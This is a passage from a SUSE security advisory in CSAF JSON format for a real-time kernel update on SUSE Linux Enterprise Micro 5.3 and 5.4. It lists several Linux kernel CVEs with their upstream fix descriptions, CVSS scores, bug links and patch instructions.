"product": {
"name": "reiserfs-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "reiserfs-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.4"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64 as component of SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64"
},
"product_reference": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch as component of SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
},
"product_reference": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64 as component of SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64"
},
"product_reference": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch as component of SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
},
"product_reference": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-49604",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-49604"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip: Fix data-races around sysctl_ip_fwd_use_pmtu.\n\nWhile reading sysctl_ip_fwd_use_pmtu, it can be changed concurrently.\nThus, we need to add READ_ONCE() to its readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-49604",
"url": "https://www.suse.com/security/cve/CVE-2022-49604"
},
{
"category": "external",
"summary": "SUSE Bug 1238414 for CVE-2022-49604",
"url": "https://bugzilla.suse.com/1238414"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2022-49604"
},
{
"cve": "CVE-2022-49943",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-49943"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: Fix obscure lockdep violation for udc_mutex\n\nA recent commit expanding the scope of the udc_lock mutex in the\ngadget core managed to cause an obscure and slightly bizarre lockdep\nviolation. In abbreviated form:\n\n======================================================\nWARNING: possible circular locking dependency detected\n5.19.0-rc7+ #12510 Not tainted\n------------------------------------------------------\nudevadm/312 is trying to acquire lock:\nffff80000aae1058 (udc_lock){+.+.}-{3:3}, at: usb_udc_uevent+0x54/0xe0\n\nbut task is already holding lock:\nffff000002277548 (kn-\u003eactive#4){++++}-{0:0}, at: kernfs_seq_start+0x34/0xe0\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #3 (kn-\u003eactive#4){++++}-{0:0}:\n lock_acquire+0x68/0x84\n __kernfs_remove+0x268/0x380\n kernfs_remove_by_name_ns+0x58/0xac\n sysfs_remove_file_ns+0x18/0x24\n device_del+0x15c/0x440\n\n-\u003e #2 (device_links_lock){+.+.}-{3:3}:\n lock_acquire+0x68/0x84\n __mutex_lock+0x9c/0x430\n mutex_lock_nested+0x38/0x64\n device_link_remove+0x3c/0xa0\n _regulator_put.part.0+0x168/0x190\n regulator_put+0x3c/0x54\n devm_regulator_release+0x14/0x20\n\n-\u003e #1 (regulator_list_mutex){+.+.}-{3:3}:\n lock_acquire+0x68/0x84\n __mutex_lock+0x9c/0x430\n mutex_lock_nested+0x38/0x64\n regulator_lock_dependent+0x54/0x284\n regulator_enable+0x34/0x80\n phy_power_on+0x24/0x130\n __dwc2_lowlevel_hw_enable+0x100/0x130\n dwc2_lowlevel_hw_enable+0x18/0x40\n dwc2_hsotg_udc_start+0x6c/0x2f0\n gadget_bind_driver+0x124/0x1f4\n\n-\u003e #0 (udc_lock){+.+.}-{3:3}:\n __lock_acquire+0x1298/0x20cc\n lock_acquire.part.0+0xe0/0x230\n lock_acquire+0x68/0x84\n __mutex_lock+0x9c/0x430\n mutex_lock_nested+0x38/0x64\n usb_udc_uevent+0x54/0xe0\n\nEvidently this was caused by the scope of udc_mutex being too large.\nThe mutex is only meant to protect udc-\u003edriver along with a few other\nthings. As far as I can tell, there\u0027s no reason for the mutex to be\nheld while the gadget core calls a gadget driver\u0027s -\u003ebind or -\u003eunbind\nroutine, or while a UDC is being started or stopped. (This accounts\nfor link #1 in the chain above, where the mutex is held while the\ndwc2_hsotg_udc is started as part of driver probing.)\n\nGadget drivers\u0027 -\u003edisconnect callbacks are problematic. Even though\nusb_gadget_disconnect() will now acquire the udc_mutex, there\u0027s a\nwindow in usb_gadget_bind_driver() between the times when the mutex is\nreleased and the -\u003ebind callback is invoked. If a disconnect occurred\nduring that window, we could call the driver\u0027s -\u003edisconnect routine\nbefore its -\u003ebind routine. To prevent this from happening, it will be\nnecessary to prevent a UDC from connecting while it has no gadget\ndriver. This should be done already but it doesn\u0027t seem to be;\ncurrently usb_gadget_connect() has no check for this. Such a check\nwill have to be added later.\n\nSome degree of mutual exclusion is required in soft_connect_store(),\nwhich can dereference udc-\u003edriver at arbitrary times since it is a\nsysfs callback. The solution here is to acquire the gadget\u0027s device\nlock rather than the udc_mutex. Since the driver core guarantees that\nthe device lock is always held during driver binding and unbinding,\nthis will make the accesses in soft_connect_store() mutually exclusive\nwith any changes to udc-\u003edriver.\n\nLastly, it turns out there is one place which should hold the\nudc_mutex but currently does not: The function_show() routine needs\nprotection while it dereferences udc-\u003edriver. The missing lock and\nunlock calls are added.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-49943",
"url": "https://www.suse.com/security/cve/CVE-2022-49943"
},
{
"category": "external",
"summary": "SUSE Bug 1244904 for CVE-2022-49943",
"url": "https://bugzilla.suse.com/1244904"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2022-49943"
},
{
"cve": "CVE-2022-49980",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-49980"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: Fix use-after-free Read in usb_udc_uevent()\n\nThe syzbot fuzzer found a race between uevent callbacks and gadget\ndriver unregistration that can cause a use-after-free bug:\n\n---------------------------------------------------------------\nBUG: KASAN: use-after-free in usb_udc_uevent+0x11f/0x130\ndrivers/usb/gadget/udc/core.c:1732\nRead of size 8 at addr ffff888078ce2050 by task udevd/2968\n\nCPU: 1 PID: 2968 Comm: udevd Not tainted 5.19.0-rc4-next-20220628-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google\n06/29/2022\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:317 [inline]\n print_report.cold+0x2ba/0x719 mm/kasan/report.c:433\n kasan_report+0xbe/0x1f0 mm/kasan/report.c:495\n usb_udc_uevent+0x11f/0x130 drivers/usb/gadget/udc/core.c:1732\n dev_uevent+0x290/0x770 drivers/base/core.c:2424\n---------------------------------------------------------------\n\nThe bug occurs because usb_udc_uevent() dereferences udc-\u003edriver but\ndoes so without acquiring the udc_lock mutex, which protects this\nfield. If the gadget driver is unbound from the udc concurrently with\nuevent processing, the driver structure may be accessed after it has\nbeen deallocated.\n\nTo prevent the race, we make sure that the routine holds the mutex\naround the racing accesses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-49980",
"url": "https://www.suse.com/security/cve/CVE-2022-49980"
},
{
"category": "external",
"summary": "SUSE Bug 1245110 for CVE-2022-49980",
"url": "https://bugzilla.suse.com/1245110"
},
{
"category": "external",
"summary": "SUSE Bug 1245111 for CVE-2022-49980",
"url": "https://bugzilla.suse.com/1245111"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2022-49980"
},
{
"cve": "CVE-2022-50232",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50232"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: set UXN on swapper page tables\n\n[ This issue was fixed upstream by accident in c3cee924bd85 (\"arm64:\n head: cover entire kernel image in initial ID map\") as part of a\n large refactoring of the arm64 boot flow. This simple fix is therefore\n preferred for -stable backporting ]\n\nOn a system that implements FEAT_EPAN, read/write access to the idmap\nis denied because UXN is not set on the swapper PTEs. As a result,\nidmap_kpti_install_ng_mappings panics the kernel when accessing\n__idmap_kpti_flag. Fix it by setting UXN on these PTEs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50232",
"url": "https://www.suse.com/security/cve/CVE-2022-50232"
},
{
"category": "external",
"summary": "SUSE Bug 1244758 for CVE-2022-50232",
"url": "https://bugzilla.suse.com/1244758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2022-50232"
},
{
"cve": "CVE-2023-52433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-52433"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip sync GC for new elements in this transaction\n\nNew elements in this transaction might expired before such transaction\nends. Skip sync GC for such elements otherwise commit path might walk\nover an already released object. Once transaction is finished, async GC\nwill collect such expired element.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-52433",
"url": "https://www.suse.com/security/cve/CVE-2023-52433"
},
{
"category": "external",
"summary": "SUSE Bug 1220137 for CVE-2023-52433",
"url": "https://bugzilla.suse.com/1220137"
},
{
"category": "external",
"summary": "SUSE Bug 1245982 for CVE-2023-52433",
"url": "https://bugzilla.suse.com/1245982"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2023-52433"
},
{
"cve": "CVE-2023-52923",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-52923"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: adapt set backend to use GC transaction API\n\nUse the GC transaction API to replace the old and buggy gc API and the\nbusy mark approach.\n\nNo set elements are removed from async garbage collection anymore,\ninstead the _DEAD bit is set on so the set element is not visible from\nlookup path anymore. Async GC enqueues transaction work that might be\naborted and retried later.\n\nrbtree and pipapo set backends does not set on the _DEAD bit from the\nsync GC path since this runs in control plane path where mutex is held.\nIn this case, set elements are deactivated, removed and then released\nvia RCU callback, sync GC never fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-52923",
"url": "https://www.suse.com/security/cve/CVE-2023-52923"
},
{
"category": "external",
"summary": "SUSE Bug 1236104 for CVE-2023-52923",
"url": "https://bugzilla.suse.com/1236104"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-52923"
},
{
"cve": "CVE-2023-53178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: fix zswap writeback race condition\n\nThe zswap writeback mechanism can cause a race condition resulting in\nmemory corruption, where a swapped out page gets swapped in with data that\nwas written to a different page.\n\nThe race unfolds like this:\n1. a page with data A and swap offset X is stored in zswap\n2. page A is removed off the LRU by zpool driver for writeback in\n zswap-shrink work, data for A is mapped by zpool driver\n3. user space program faults and invalidates page entry A, offset X is\n considered free\n4. kswapd stores page B at offset X in zswap (zswap could also be\n full, if so, page B would then be IOed to X, then skip step 5.)\n5. entry A is replaced by B in tree-\u003erbroot, this doesn\u0027t affect the\n local reference held by zswap-shrink work\n6. zswap-shrink work writes back A at X, and frees zswap entry A\n7. swapin of slot X brings A in memory instead of B\n\nThe fix:\nOnce the swap page cache has been allocated (case ZSWAP_SWAPCACHE_NEW),\nzswap-shrink work just checks that the local zswap_entry reference is\nstill the same as the one in the tree. If it\u0027s not the same it means that\nit\u0027s either been invalidated or replaced, in both cases the writeback is\naborted because the local entry contains stale data.\n\nReproducer:\nI originally found this by running `stress` overnight to validate my work\non the zswap writeback mechanism, it manifested after hours on my test\nmachine. The key to make it happen is having zswap writebacks, so\nwhatever setup pumps /sys/kernel/debug/zswap/written_back_pages should do\nthe trick.\n\nIn order to reproduce this faster on a vm, I setup a system with ~100M of\navailable memory and a 500M swap file, then running `stress --vm 1\n--vm-bytes 300000000 --vm-stride 4000` makes it happen in matter of tens\nof minutes. One can speed things up even more by swinging\n/sys/module/zswap/parameters/max_pool_percent up and down between, say, 20\nand 1; this makes it reproduce in tens of seconds. It\u0027s crucial to set\n`--vm-stride` to something other than 4096 otherwise `stress` won\u0027t\nrealize that memory has been corrupted because all pages would have the\nsame data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53178",
"url": "https://www.suse.com/security/cve/CVE-2023-53178"
},
{
"category": "external",
"summary": "SUSE Bug 1249827 for CVE-2023-53178",
"url": "https://bugzilla.suse.com/1249827"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53178"
},
{
"cve": "CVE-2023-53407",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53407"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: pxa27x_udc: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53407",
"url": "https://www.suse.com/security/cve/CVE-2023-53407"
},
{
"category": "external",
"summary": "SUSE Bug 1253028 for CVE-2023-53407",
"url": "https://bugzilla.suse.com/1253028"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53407"
},
{
"cve": "CVE-2023-53412",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53412"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: bcm63xx_udc: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
